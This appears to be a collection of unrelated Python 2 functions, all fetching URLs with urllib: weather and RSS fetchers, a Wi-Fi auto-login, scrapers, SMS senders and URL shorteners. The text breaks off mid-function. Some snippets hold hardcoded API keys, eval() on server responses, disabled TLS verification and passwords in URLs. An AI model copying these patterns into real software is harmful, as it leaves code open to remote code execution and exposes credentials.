def getTiempo():
    dicc = {}
    code = urllib.urlopen("http://weather.yahooapis.com/forecastrss?w=468739&u=c")
    tempsmn = urllib.urlopen("http://www.smn.gov.ar/layouts/temperatura_layout.php").read().decode('iso-8859-1').encode("utf-8").split("º")[0]
    parse = et.parse(code)
    root = parse.getroot()
    tiempo = root[0][12][5].attrib
    dicc['temperatura'] = str(tempsmn)
    if dicc['temperatura'] == "":
        print getTime(), "[Tiempo] ADV: Temperatura de Yahoo"
        dicc['temperatura'] = str(tiempo['temp'])
    estadosArray = ['Tornado', 'Tormenta tropical', 'Huracán', "Tormentas fuertes", "Tormenta",
                    "Lluvia y nieve", "Lluvia y aguanieve", "Aguanieve y nieve", "Llovizna helada",
                    "Llovizna", "Lluvia helada", "Lluvia", "Lluvia", "Copos de nieve", "Lluvia ligera",
                    "Nieve y viento", "Nieve", "Granizo", "Aguanieve", "Polvo", "Brumoso", "Neblina",
                    "Humo", "Un poco ventoso", "Ventoso", "Frío", "Nublado", "Parcialmente nublado",
                    "Parcialmente nublado", "Un poco nublado", "Un poco nublado", "Despejado", "Soleado",
                    "Templado", "Templado", "Lluvia con piedras", "Caluroso", "Tormentas aisladas",
                    "Tormentas dispersas", "Tormentas dispersas", "Lluvias Dispersas", "Fuertes Nevadas",
                    "Nevada Leve Dispersa", "Fuertes Nevadas", "Parcialmente Nublado", "Chaparrón",
                    "Nevada Leve", "Chaparrones Aislados"]
    dicc['estado'] = estadosArray[int(tiempo['code'])]
    dicc['icono'] = 'http://l.yimg.com/a/i/us/nws/weather/gr/' + str(tiempo['code']) + dayOrNight(tiempo['date']) + '.png'
    dicc['minima'] = root[0][12][7].attrib['low']
    dicc['maxima'] = root[0][12][7].attrib['high']
    pronextarray = []
    dicc['extendido'] = pronextarray
    for x in range(8, 12):
        pronextarray.append({"dia": root[0][12][x].attrib['day'],
                             "fecha": root[0][12][x].attrib['date'],
                             "minima": root[0][12][x].attrib['low'],
                             "maxima": root[0][12][x].attrib['high'],
                             "estado": estadosArray[int(root[0][12][x].attrib['code'])],
                             "icono": 'http://l.yimg.com/a/i/us/nws/weather/gr/' + str(root[0][12][x].attrib['code']) + 'd.png'})
    jsonString = json.dumps(dicc)
    jsonFile = open("../servicios/tiempo/serv.json", 'w')
    jsonFile.write(jsonString)
    jsonFile.close()
    print getTime(), "[Tiempo] JSON editado"
    threading.Timer(1800.0, getTiempo).start()
def _child_main_loop(self, queue):
    while True:
        url = "http://geekhost.net/OK"
        f = urllib.urlopen(url)
        data = f.read()
        #print data
        abcPattern = re.compile(r'OK')
        if abcPattern.match(data):
            queue.put('Already logined')
        else:
            queue.put('Need login')
            LOGIN_URL = 'https://auth-wlc.ntwk.dendai.ac.jp/login.html'
            #LOGIN_URL = 'http://geekhost.net/checkparams.php'
            pd = yaml.load(open('config.yaml').read().decode('utf-8'))
            pd['buttonClicked'] = '4'
            pd['redirect_url'] = 'http://google.com/'
            pd["err_flag"] = "0"
            pd["err_msg"] = ""
            pd["info_flag"] = "0"
            pd["info_msg"] = ""
            params = urllib.urlencode(pd)
            print repr(params)
            up = urllib.urlopen(LOGIN_URL, params)
        # then just sleep until the next check
        time.sleep(yaml.load(open('config.yaml').read().decode('utf-8'))['threadtime'])
def RepoSearch(url):
    if url is None:
        repeat = True
    else:
        repeat = False
    for np in range(1, maxpg + 1):
        if repeat:
            url = "https://github.com/search?p=" + str(np) + "&q=" + search + "&type=Repositories"
        else:
            if np > 1:
                return
        page = html.fromstring(urllib.urlopen(url).read())
        if len(page.find_class('repo-list-name')) == 0:
            tmp = "Too many requests"
            if urllib.urlopen(url).read().find(tmp) != -1:
                print col.FAIL, col.BOLD, "Due to GitHub policy you can't make too many requests, wait a minute!", col.ENDC
                break
            if np == 1:
                print col.FAIL, col.BOLD, "Repo not found", col.ENDC
            break
        for link in page.find_class('repo-list-name'):
            rep = link.getchildren()[0].get('href')
            print rep, ":"
            print col.OKBLUE, col.BOLD, "\thttps://github.com" + rep + ".git\n", col.ENDC
    return
def _TreeStatusTestHelper(self, tree_status, general_state, expected_return,
                          retries_500=0, max_timeout=0):
    """Tests whether we return the correct value based on tree_status."""
    return_status = self._TreeStatusFile(tree_status, general_state)
    self.mox.StubOutWithMock(urllib, 'urlopen')
    status_url = 'https://chromiumos-status.appspot.com/current?format=json'
    backoff = 1
    sleep_timeout = 1
    for _attempt in range(retries_500):
        urllib.urlopen(status_url).AndReturn(return_status)
        return_status.getcode().AndReturn(500)
        time.sleep(backoff)
        backoff *= 2

    urllib.urlopen(status_url).MultipleTimes().AndReturn(return_status)

    # Time is checked twice to bootstrap.
    start_time = 1
    self.mox.StubOutWithMock(time, 'time')
    time.time().AndReturn(start_time)
    time.time().AndReturn(start_time)
    if expected_return == False:
        for time_plus in xrange(max_timeout + 1):
            time.time().AndReturn(start_time + time_plus)
        self.mox.StubOutWithMock(cros_build_lib, 'Info')
        cros_build_lib.Info(mox.IgnoreArg(), mox.IgnoreArg()).MultipleTimes()
        time.sleep(sleep_timeout).MultipleTimes()

    return_status.getcode().MultipleTimes().AndReturn(200)
    return_status.read().MultipleTimes().AndReturn(return_status.json)
    self.mox.ReplayAll()
    self.assertEqual(cros_build_lib.TreeOpen(status_url, sleep_timeout, max_timeout),
                     expected_return)
    self.mox.VerifyAll()
def find_proxy(url, timeout, testing_url):
    try:
        response = urllib.urlopen(url)
    except:
        if Debug:
            print "Request to get proxy failed."
        return (False, False)
    result = response.getcode()
    content = response.read()
    data = json.loads(content)
    if Debug:
        print data['curl']
    start_time = time.time()
    try:
        response = urllib.urlopen(testing_url, proxies={'http': data['curl']})
    except:
        if Debug:
            print "Proxy test request failed."
        return (False, False)
    result = response.getcode()
    request_time = time.time() - start_time
    if result == 200:
        if Debug:
            print "\n\nGot test url with %d in %f seconds" % (result, request_time)
        return (data['curl'], request_time)
    else:
        if Debug:
            print "Failed with %d" % result
        return (False, False)
def wikipedia(self, artistname):
    # Fetch monthly page-view counts for the artist from stats.grok.se.
    values = []
    months = []
    wiki = {}
    for i in range(1, 13):
        if i < 10:
            yearmonth = "20130" + str(i)
        else:
            yearmonth = "2013" + str(i)
        website = "http://stats.grok.se/en/" + yearmonth + "/" + artistname
        f = urllib.urlopen(website)
        s = f.read()
        regex = re.compile("has been viewed (\d*)")
        r = regex.search(s)
        wiki[yearmonth] = int(r.groups()[0])
        values.append(int(r.groups()[0]))
        months.append(yearmonth)
        f.close()
    for i in range(1, 4):
        yearmonth = "20140" + str(i)
        website = "http://stats.grok.se/en/" + yearmonth + "/" + artistname
        f = urllib.urlopen(website)
        s = f.read()
        regex = re.compile("has been viewed (\d*)")
        r = regex.search(s)
        wiki[yearmonth] = int(r.groups()[0])
        values.append(int(r.groups()[0]))
        months.append(yearmonth)
        f.close()
    print "finished wiki"
    return [values, months]
def wait_on_app(port):
    """ Waits for the application hosted on this machine, on the given port,
        to respond to HTTP requests.

    Args:
      port: Port where app is hosted on the local machine

    Returns:
      True on success, False otherwise
    """
    backoff = INITIAL_BACKOFF_TIME
    retries = MAX_FETCH_ATTEMPTS
    private_ip = appscale_info.get_private_ip()

    url = "http://" + private_ip + ":" + str(port) + FETCH_PATH
    while retries > 0:
        try:
            urllib.urlopen(url)
            return True
        except IOError:
            retries -= 1

        logging.warning("Application was not up at %s, retrying in %d seconds" %
                        (url, backoff))
        time.sleep(backoff)
        backoff *= 2

    logging.error("Application did not come up on %s after %d attempts" %
                  (url, MAX_FETCH_ATTEMPTS))
    return False
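# A minimal usage sketch for wait_on_app above, assuming the surrounding module
# already defines INITIAL_BACKOFF_TIME, MAX_FETCH_ATTEMPTS, FETCH_PATH and
# appscale_info; the port number here is only illustrative.
if not wait_on_app(8080):
    logging.error("Giving up: the application never became reachable.")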
def main():
    html = urllib.urlopen("http://bankpro.jrj.com.cn/json/f.jspa?size=500&pn=1&t={%22xszt%22:%220%22,%22st%22:%220%22,%22xsdq%22:%22-1,-1%22,%22sort%22:%22sell_org_date%22,%22order%22:%22desc%22,%22wd%22:%22%22}").read()
    run(html)
    time.sleep(1)
    html = urllib.urlopen("http://bankpro.jrj.com.cn/json/f.jspa?size=500&pn=1&t={%22xszt%22:%221%22,%22st%22:%220%22,%22xsdq%22:%22-1,-1%22,%22sort%22:%22sell_org_date%22,%22order%22:%22desc%22,%22wd%22:%22%22}").read()
    run(html)
    time.sleep(1)
def run(self):
    """Executes the body of the script."""
    logging.info("Log level set to INFO")
    logging.debug("Log level set to DEBUG")
    jobNumber = self.jobNumber
    portalURL = self.server
    home = '/home/sbsuser/pacbio/raw/'
    splicehome = '/pacbio/raw'
    ext = self.opts.ext
    records = set()
    if ext == "ccs_reads.fastq":
        cmd = 'wget http://node1.1425mad.mssm.edu/pacbio/secondary/%s/%s/data/ccs_reads.fastq' % (jobNumber[:3], jobNumber)
        logging.info(cmd)
        os.system(cmd)
    elif ext == "cmp.h5":
        cmd = 'wget http://node1.1425mad.mssm.edu/pacbio/secondary/%s/%s/data/aligned_reads.cmp.h5' % (jobNumber[:3], jobNumber)
        logging.info(cmd)
        os.system(cmd)
    elif ext == "bax.h5":
        logIn = urllib.urlopen('http://node1.1425mad.mssm.edu/pacbio/secondary/%s/%s/log/smrtpipe.log' % (jobNumber[:3], jobNumber))
        for line in logIn:
            if home in line:
                ll = line.split(" ")
                line = ll[-3]
                if not "m" in line[line.find(splicehome):line.find("bax.h5")]:
                    continue
                records.add(portalURL + line[line.find(splicehome):line.find("bax.h5")] + ext)
                records.add(portalURL + line[line.find(splicehome):line.find("bax.h5") - 2] + "bas.h5")
    else:
        print >>sys.stderr, "Not supported file type!"
    for address in records:
        logging.info(address)
        fileIn = urllib.urlopen(address)
        if self.opts.noprefix:
            fileout = open(address.split('/')[-1], 'w')
        else:
            fileout = open(self.prefix + address.split('/')[-1], 'w')
        fileout.write(fileIn.read())
        fileout.close()
    return 0
def send_sms(self, phone, content):
    try:
        params = {'phone': phone, 'content': content}
        data = urllib.urlencode(params)
        smsUrl = 'http://yw.admin.youja.cn/sms'
        urllib.urlopen(smsUrl, data=data)
    except:
        pass
def get(self, action=""):
    url = self.request.get("url")
    try:
        # bit.ly
        result = urllib.urlopen("http://api.bit.ly/v3/shorten?login=crowy&apiKey=R_57bab6c0fb01da4e1e0a5e22f73c3a4a&format=json&longUrl=%s" % urllib.quote(url)).read()
        json = simplejson.loads(result)
        if json['status_code'] == 200:
            self.response.out.write(json['data']['url'])
            return
        else:
            logging.warn(result)
    except:
        logging.warn("Unexpected error.")
    try:
        # goo.gl
        api_url = 'https://www.googleapis.com/urlshortener/v1/url?key=AIzaSyBRoz9ItBIQgHwWbZbmkF45dFiRKub2XzI&userip=' + self.request.remote_addr
        post_data = simplejson.dumps({'longUrl': url})
        result = urlfetch.fetch(url=api_url,
                                payload=post_data,
                                method=urlfetch.POST,
                                headers={'Content-Type': 'application/json'})
        if result.status_code == 200:
            result = simplejson.loads(result.content)
            self.response.out.write(result['id'])
            return
        else:
            logging.warn(result.content)
    except:
        logging.warn("Unexpected error.")
    try:
        # tinyurl
        short_url = urllib.urlopen("http://tinyurl.com/api-create.php?url=%s" % urllib.quote(url))
        self.response.out.write(short_url.read())
        return
    except:
        logging.warn("Unexpected error.")
    self.error(400)
def requires():
    print "** COORDINATOR **"
    # print redwood_host
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    # now query the metadata service so I have the mapping of bundle_uuid & file names -> file_uuid
    print str("https://" + redwood_host + ":8444/entities?page=0")
    json_str = urlopen(str("https://" + redwood_host + ":8444/entities?page=0"), context=ctx).read()
    metadata_struct = json.loads(json_str)
    print "** METADATA TOTAL PAGES: " + str(metadata_struct["totalPages"])
    for i in range(0, metadata_struct["totalPages"]):
        print "** CURRENT METADATA TOTAL PAGES: " + str(i)
        json_str = urlopen(str("https://" + redwood_host + ":8444/entities?page=" + str(i)), context=ctx).read()
        metadata_struct = json.loads(json_str)
        for file_hash in metadata_struct["content"]:
            bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_" + file_hash["fileName"]] = file_hash["id"]
            #print bundle_uuid_filename_to_file_uuid
            # HACK!!! Please remove once the behavior has been fixed in the workflow!!
            if file_hash["fileName"].endswith(".sortedByCoord.md.bam"):
                bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_sortedByCoord.md.bam"] = file_hash["id"]
            if file_hash["fileName"].endswith(".tar.gz"):
                bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_tar.gz"] = file_hash["id"]
            if file_hash["fileName"].endswith(".wiggle.bg"):
                bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_wiggle.bg"] = file_hash["id"]
def parseresultpage(page, search, order, sort, regex):
    logger.info(" [+] Pulling results from page " + str(page))
    githubbase = "https://github.com/search?"
    githubsearchurl = {"o": order, "p": page, "q": search, "s": sort,
                       "type": "Code", "ref": "searchresults"}
    searchurl = githubbase + str(urlencode(githubsearchurl))
    pagehtml = urlopen(searchurl).read()
    soup = BeautifulSoup(pagehtml, "html.parser")

    # Find GitHub div with code results
    results = soup.findAll("div", attrs={"class": "code-list-item"})

    # Pull URLs from results and hit each of them
    soup1 = BeautifulSoup(str(results), "html.parser")
    for item in soup1.findAll("p", attrs={"class": "full-path"}):
        soup2 = BeautifulSoup(str(item), "html.parser")
        for link in soup2.findAll("a"):
            individualresult = "https://github.com" + str(link["href"])
            individualresultpage = urlopen(individualresult).read()
            soup3 = BeautifulSoup(str(individualresultpage), "html.parser")
            for rawlink in soup3.findAll("a", attrs={"id": "raw-url"}):
                rawurl = "https://github.com" + str(rawlink["href"])
                if args.custom_regex:
                    searchcode(rawurl, regex)
                else:
                    wpsearchcode(rawurl, regex)
def parseFeed():
    linklist = []
    info = []
    d = feedparser.parse('http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&output=rss')
    feedlink = d.feed.link
    site = urllib.urlopen(feedlink).read()
    parsed = parser.feed(site)
    j = 0
    foundlinks = False
    for line in parsed:
        #if foundlinks:
        #    print line
        if "attr" in line and "links" in line:
            foundlinks = True
            print line
    links = []
    i = 2
    x = 0
    for link in links:
        linklist.append(link.firstChild.nodeValue)
        page = urllib.urlopen(link.firstChild.nodeValue).read()
        info.append(re.search('h', page))
        i = i - 1
        if i == 0:
            break
    #for item in info:
    #    x = x + 1
    return info
def downloadPSSOPage(self):
    username = self.lineEdit.text()
    password = self.lineEdit_2.text()
    login_url = 'https://psso.fh-koeln.de/qisserver/rds?state=user&type=1&category=auth.login&startpage=portal.vm&breadCrumbSource=portal'
    params = urllib.urlencode({'asdf': username, 'fdsa': password, 'submit': 'Login'})  # lol
    html_1 = urllib.urlopen(login_url, params).read()
    if not noten.checkLogin(html_1):
        self.showErrorPopup(u"Sind die Login Daten möglicherweise falsch?")
        return
    try:
        # From here on we simulate a crawler
        html_2 = urllib.urlopen(noten.getLinkByName(html_1, "Prüfungsverwaltung")).read()
        html_3 = urllib.urlopen(noten.getLinkByName(html_2, "Notenspiegel")).read()
        html_4 = urllib.urlopen(noten.getLinkByName(html_3, re.compile("Abschluss"))).read()
        html_5 = urllib.urlopen(noten.getLinkByGraphic(html_4, "/QIS/images//his_info3.gif")).read()
    except TypeError as e:
        self.showErrorPopup(u"Scheinbar haben sich die PSSO Seiten verändert… Sag' bitte Hugo bescheid, damit er das Programm reparieren kann!")
        return
    try:
        anz_noten, anz_credits, schnitt = noten.getInfos(html_5)
        name = noten.getStudentName(html_5)
        self.presentResults(anz_noten, anz_credits, schnitt, name)
    except noten.ParsingError as e:
        self.showErrorPopup(str(e))
def image(title, id):
    titleUrl = "http://de.wikipedia.org/w/api.php?action=query&titles=" + title + "&prop=images&format=json"
    imgJson = simplejson.loads(urllib.urlopen(titleUrl).read())
    imageUrl = None
    if imgJson['query']['pages'].has_key(id):
        if imgJson['query']['pages'][id].has_key('images'):
            if imgJson['query']['pages'][id]['images'][0]:
                imageTitle = imgJson['query']['pages'][id]['images'][0]['title']
                imageTitle = imageTitle.encode('utf-8')
                imageTitleUrl = "http://de.wikipedia.org/w/api.php?action=query&titles=" + imageTitle + "&prop=imageinfo&iiprop=url&format=json"
                imgTitleJson = simplejson.loads(urllib.urlopen(imageTitleUrl).read())
                if imgTitleJson['query']['pages'].has_key("-1"):
                    if imgTitleJson['query']['pages']['-1'].has_key('imageinfo'):
                        imageUrl = imgTitleJson['query']['pages']['-1']['imageinfo'][0]['url']
                elif imgTitleJson['query']['pages'].has_key('id'):
                    if imgTitleJson['query']['pages']['id'].has_key('imageinfo'):
                        imageUrl = imgTitleJson['query']['pages']['id']['imageinfo'][0]['url']
    return imageUrl
def _stop_server(cls):
    import urllib  # Yup, that's right.
    try:
        urllib.urlopen(cls.scheme + '://' + cls.host + ':' + str(cls.port) + '/shutdown')
    except IOError:
        pass
    cls.server_thread.join()
def main(max_base, separator='\t'):
    f = urllib.urlopen("http://bealstreasure.com/members/getwork.php?username="******"&max_base=" + str(max_base)).read()
    warning("f: ", f)
    tmp_vals = f.split(",")
    warning("tmp_vals: ", tmp_vals)
    (m, n, set_id) = (int(tmp_vals[0]), int(tmp_vals[1]), tmp_vals[2])
    max_exp = max([m, n])
    table = initial_data_table(max_base, m, n)
    if (max_exp < max([m, n]) + 10):
        table = initial_data_table(max_base, m, n)
        max_exp = max([m, n])
    powx, powy = initial_data_pow(max_base, m, n)
    for x in xrange(1, max_base):
        powx_tmp = powx[x]
        for y in xrange(1, x):
            if gcd(x, y) > 1:
                continue
            sum = powx_tmp + powy[y]
            zr = table.get(sum)
            if zr:
                report(x, m, y, n)
    f = urllib.urlopen("http://bealstreasure.com/members/savework.php?result=false&memory=" + str(memory) + "&id=" + str(set_id)).read()
    printing("(%d, %d, %s)" % (m, n, set_id))
def update(self):
    playlist_id_query = 'https://www.googleapis.com/youtube/v3/channels?' \
                        'part=contentDetails&id=%s&key=%s' % \
                        (self.config['channel_id'], self.config['api_key'])
    file_a = urllib.urlopen(playlist_id_query)
    playlist_response = json.loads(file_a.read())
    playlist_id = playlist_response['items'][0]['contentDetails'][
        'relatedPlaylists']['uploads']

    query = "https://www.googleapis.com/youtube/v3/playlistItems?" \
            "part=snippet&playlistId=%s&key=%s" % \
            (playlist_id, self.config['api_key'])
    file_b = urllib.urlopen(query)
    raw = file_b.read()
    response = json.loads(raw)

    for entry in response['items']:
        snippet = entry['snippet']
        video_id = snippet['resourceId']['videoId']
        video_url = 'https://www.youtube.com/watch?v=%s' % video_id
        link = video_url
        try:
            image_url = snippet['thumbnails']['maxres'].get('url')
        except KeyError:
            image_url = snippet['thumbnails']['high'].get('url')
        self.create_story(
            link,
            title=snippet.get('title'),
            body=snippet['description'],
            image_url=image_url,
            timestamp=datetime.strptime(
                snippet['publishedAt'], '%Y-%m-%dT%H:%M:%S.000Z'
            ),
        )
def Configure(self, prefix="XBMC-Event", xbmcip="192.168.1.1", xbmchttpport=8080,
              zone="224.0.0.2", port=8278, selfXbmceventbroadcast=False,
              payDelim="<b></b>"):
    panel = eg.ConfigPanel(self)
    editCtrl = panel.TextCtrl(prefix)
    xbmcipCtrl = panel.TextCtrl(xbmcip)
    xbmchttpportCtrl = panel.SpinIntCtrl(xbmchttpport, min=1, max=65535)
    zoneCtrl = panel.TextCtrl(zone)
    portCtrl = panel.SpinIntCtrl(port, min=1, max=65535)
    selfXbmceventbroadcastCtrl = panel.CheckBox(selfXbmceventbroadcast)
    payDelimCtrl = panel.TextCtrl(payDelim)
    panel.AddLine(self.text.eventPrefix, editCtrl)
    panel.AddLine(self.text.xbmcip, xbmcipCtrl)
    panel.AddLine(self.text.xbmchttpport, xbmchttpportCtrl)
    panel.AddLine(self.text.zone, zoneCtrl)
    panel.AddLine(self.text.port, portCtrl)
    panel.AddLine(self.text.selfXbmceventbroadcast, selfXbmceventbroadcastCtrl)
    panel.AddLine("Payload Delimiter", payDelimCtrl)
    while panel.Affirmed():
        panel.SetResult(editCtrl.GetValue(),
                        xbmcipCtrl.GetValue(),
                        int(xbmchttpportCtrl.GetValue()),
                        zoneCtrl.GetValue(),
                        int(portCtrl.GetValue()),
                        selfXbmceventbroadcastCtrl.GetValue(),
                        payDelimCtrl.GetValue())
        v_header = urllib.quote("This is the Header")
        v_message = urllib.quote("This is the Message")
        host_xbmc = xbmcipCtrl.GetValue()
        port_xbmc = int(xbmchttpportCtrl.GetValue())
        udp_xbmc = int(portCtrl.GetValue())
        url_xbmc = "http://" + str(host_xbmc) + ":" + str(port_xbmc) + \
                   "/xbmcCmds/xbmcHttp?command=SetBroadcast&parameter=2;" + str(udp_xbmc) + \
                   "(Notification(" + v_header + "," + v_message + "))"
        print str(url_xbmc)
        try:
            urllib.urlopen(url_xbmc)
        except IOError:
            print 'Connection error'
def ping_google(sitemap_url=None, ping_url=PING_URL):
    """
    Alerts Google that the sitemap for the current site has been updated.
    If sitemap_url is provided, it should be an absolute path to the sitemap
    for this site -- e.g., '/sitemap.xml'. If sitemap_url is not provided, this
    function will attempt to deduce it by using urlresolvers.reverse().
    """
    if sitemap_url is None:
        try:
            # First, try to get the "index" sitemap URL.
            sitemap_url = urlresolvers.reverse('django.contrib.sitemaps.views.index')
        except urlresolvers.NoReverseMatch:
            try:
                # Next, try for the "global" sitemap URL.
                sitemap_url = urlresolvers.reverse('django.contrib.sitemaps.views.sitemap')
            except urlresolvers.NoReverseMatch:
                pass

    if sitemap_url is None:
        raise SitemapNotFound("You didn't provide a sitemap_url, and the sitemap URL couldn't be auto-detected.")

    from django.contrib.sites.models import Site
    current_site = Site.objects.get_current()
    url = "http://%s%s" % (current_site.domain, sitemap_url)
    params = urllib.urlencode({'sitemap': url})
    urllib.urlopen("%s?%s" % (ping_url, params))
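# A minimal usage sketch for ping_google above, in the spirit of Django's
# ping_google management command; the '/sitemap.xml' path is illustrative and
# assumes that URL actually serves the site's sitemap.
try:
    ping_google(sitemap_url='/sitemap.xml')
except SitemapNotFound:
    print "Sitemap URL could not be determined; Google was not pinged."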
def main_loop(self):
    while True:
        try:
            time.sleep(1)
            this_dir = os.listdir(os.getcwd())
            that_dir = eval(urllib.urlopen(self.url + "/list/" + self.username + "/" + self.password).read())
            if str(this_dir) != str(that_dir):
                for this in this_dir:
                    if this not in self.files and this != sys.argv[0]:
                        with open(this, "rb") as md5file:
                            print "added", this
                            self.files[this] = hashlib.md5(md5file.read()).hexdigest()
                    if this not in that_dir and this != sys.argv[0]:
                        thread.start_new_thread(self.upload, (this,))
                for that in that_dir:
                    if that not in this_dir:
                        thread.start_new_thread(self.download, (that,))
            for file in self.files:
                try:
                    with open(file, "rb") as check_file:
                        check = hashlib.md5(check_file.read()).hexdigest()
                        if check != self.files[file]:
                            print file, "changed"
                            urllib.urlopen(self.url + "/delete/" + self.username + "/" + self.password + "/" + file)
                            self.files[file] = check
                            thread.start_new_thread(self.upload, (file,))
                except IOError:
                    pass
        except IOError:
            print "It seems as though your server is down, please check it."
            time.sleep(60)
def get_cur(self):
    types = ('alpha', 'beta', 'pre', 'rc', None, 'p')
    version = self.base[0]
    if self.opts.version is not None:
        version = self.opts.version
    type = self.base[1]
    if self.opts.type == 'tagged':
        type = 4
        self.opts.hash = None
    elif self.opts.type is not None:
        type = types.index(self.opts.type)
    if self.opts.branch:
        self.branch = self.opts.branch
    elif type < 4:
        self.branch = 'master'
    else:
        self.branch = 'fixes/{0}'.format('.'.join(version.split('.')[0:2]))
    if type != 4:
        if self.opts.hash is None:
            commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" +
                                              urllib.quote(self.branch, '')))
            self.opts.hash = commit['sha']
            if self.opts.date is None:
                self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d')
            print "Autoselecting hash: " + self.opts.hash
        elif self.opts.date is None:
            commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" +
                                              self.opts.hash))
            self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d')
    self.cur = (version, type, self.opts.date)
    if self.opts.verbose:
        print 'New version set to: {0}-{1}'.format(self.name, self.get_version(self.cur))
def update_urls():
    workers = itertools.cycle(models.get_workers())
    remote_urls = models.get_urls_to_check()
    for url in remote_urls:
        response = _make_request(workers.next(), url)
        for subscriber in url.subscribers:
            urllib.urlopen(subscriber.callback, data=response)
def __init__(self, versions):
    self.versions = versions
    resp = urllib.urlopen("https://issues.apache.org/jira/rest/api/2/field")
    data = json.loads(resp.read())
    self.fieldIdMap = {}
    for part in data:
        self.fieldIdMap[part['name']] = part['id']
    self.jiras = []
    at = 0
    end = 1
    count = 100
    while (at < end):
        params = urllib.urlencode({'jql': "project in (HADOOP,HDFS,MAPREDUCE,YARN) and fixVersion in ('" +
                                          "' , '".join(versions) + "') and resolution = Fixed",
                                   'startAt': at,
                                   'maxResults': count})
        resp = urllib.urlopen("https://issues.apache.org/jira/rest/api/2/search?%s" % params)
        data = json.loads(resp.read())
        if (data.has_key('errorMessages')):
            raise Exception(data['errorMessages'])
        at = data['startAt'] + data['maxResults']
        end = data['total']
        self.jiras.extend(data['issues'])
    self.iter = self.jiras.__iter__()
def getRss():
    codert = urllib.urlopen("http://actualidad.rt.com/feeds/all.rss?rss=1")
    codetn = urllib.urlopen("http://www.tn.com.ar/rss.xml")
    codeinfobae = urllib.urlopen("http://cdn01.ib.infobae.com/adjuntos/162/rss/Infobae.xml")
    #codetelam = urllib.urlopen("http://www.telam.com.ar/rss2/ultimasnoticas.xml")

    jsonrt = {"rss": base64.b64encode(codert.read())}
    filert = open("../servicios/rt/serv.json", 'w')
    filert.write(json.dumps(jsonrt))
    filert.close()

    jsontn = {"rss": base64.b64encode(codetn.read())}
    filetn = open("../servicios/tn/serv.json", 'w')
    filetn.write(json.dumps(jsontn))
    filetn.close()

    jsoninfobae = {"rss": base64.b64encode(codeinfobae.read())}
    fileinfobae = open("../servicios/infobae/serv.json", 'w')
    fileinfobae.write(json.dumps(jsoninfobae))
    fileinfobae.close()

    '''filetelam = open("../servicios/telam/rss.xml", 'w')
    filetelam.write(codetelam.read())
    filetelam.close()'''

    print getTime(), "[RSS] RSS's actualizados"
    threading.Timer(300.0, getRss).start()
def SendSms(self, text="Default text message"):
    deltaT = datetime.now() - self.last_sms
    if deltaT.seconds > self.min_period or self.sent == 0:
        if self.settings.debug > 0:
            logging.info("Debug SMS sent %s " % time.strftime("%I:%M:%S %p", time.localtime()))
            self.sent = 1
            return 1
        else:
            self.last_sms = datetime.now()
            self.config = {}
            self.config['username'] = self.username
            self.config['password'] = self.password
            # needs to be changed with international prefix, what a hassle!
            self.config['to'] = self.to
            self.config['from'] = self.sender
            self.config['text'] = text
            self.config['maxconcat'] = self.MaxConCatMsgs
            query = urllib.urlencode(self.config)
            try:
                if self.UseProxies > 0:
                    file = urllib.urlopen(self.url1 + self.pushpage, query, proxies=self.proxies)
                else:
                    file = urllib.urlopen(self.url1 + self.pushpage, query, proxies=None)
            except IOError, (errno):
                logging.error("Error delivering online SMS %s " % errno)
                return 0
            self.sent = 1
            self.output = file.read()
            file.close()
            logging.info("Message sent to %s from %s" % (self.to, self.sender))
            #return self.ParseRequest()
            return 1
def run(self):
    use_selection = 0
    if self.parent.ch_lyrics_song_list.GetSelection() >= 0:
        use_selection = self.parent.ch_lyrics_song_list.GetSelection()
    #print query_string
    url_connection = urllib.urlopen(self.query_string.replace(' ', '+'))
    raw_results = url_connection.read()
    results_array = raw_results.split('\n')
    #print results_array
    self.parent.ch_lyrics_song_list.Clear()
    for x in results_array:
        y = x.split('\\')[1]
        self.parent.ch_lyrics_song_list.Append(y)
    if len(results_array) >= 1:
        if use_selection > (len(results_array) - 1):
            use_selection = 0
        self.parent.ch_lyrics_song_list.SetSelection(use_selection)
        lyrics_id = results_array[use_selection].split('\\')[0]
        #print lyrics_id
        # http://www.lyrdb.com/getlyr.php?q=id
        lyrics_query = 'http://www.lyrdb.com/getlyr.php?q=' + lyrics_id
        lyrics_query = url_quote(lyrics_query)
        try:
            url_connection = urllib.urlopen(lyrics_query.replace(' ', '+'))
            raw_results = url_connection.read()
        except Exception, expt:
            raw_results = str(Exception) + ' ' + str(expt)
def main():
    search_str = sys.argv[1]
    movie_ID_list = []
    pair = []
    calls = 0

    # movie_ID_name
    movie_ID_name_csv.write("Id,Label\n")
    for i in range(1, 7):
        if (calls == 4):
            time.sleep(1)
        response = urllib.urlopen(search_url + str(i))
        calls = (calls + 1) % 5
        data = json.loads(response.read())
        #print "ID: ", data["movies"][0]["id"], ", Title: ", data["movies"][0]["title"]
        for movie in data["movies"]:
            movie_ID_name.write(movie["id"] + "," + movie["title"] + "\n")
            movie_ID_name_csv.write(movie["id"] + "," + movie["title"] + "\n")
            movie_ID_list.append(movie["id"])

    # movie_ID_sim_movie_ID
    movie_ID_sim_movie_ID_csv.write("Source,Target,Type\n")
    for movie_id in movie_ID_list:
        if (calls == 4):
            time.sleep(1)
        response = urllib.urlopen(sim_url1 + movie_id + sim_url2)
        calls = (calls + 1) % 5
        data = json.loads(response.read())
        for movie in data["movies"]:
            if ([movie["id"], movie_id] in pair):
                continue
            movie_ID_sim_movie_ID.write(movie_id + "," + movie["id"] + "\n")
            movie_ID_sim_movie_ID_csv.write(movie_id + "," + movie["id"] + ",Undirected\n")
            pair.append([movie_id, movie["id"]])
def check_update():
    """
    Check for a new version on the remote server and print its release note.
    :return: None
    """
    current_version = u'1.0.1.zip'
    try:
        url_path = urlopen("http://www-tac.cisco.com/~yalv/development/Zenus/download/mac/")
        raw_html = url_path.read().decode('utf-8')
        pattern = re.compile('.{6}zip')
        update_version = max(list(set(pattern.findall(raw_html))))
        if update_version > current_version:
            print(colored('=' * line_length, 'green'))
            print(colored(" New Version %s Found, Go to following link to download:" % update_version[:-4], 'green'))
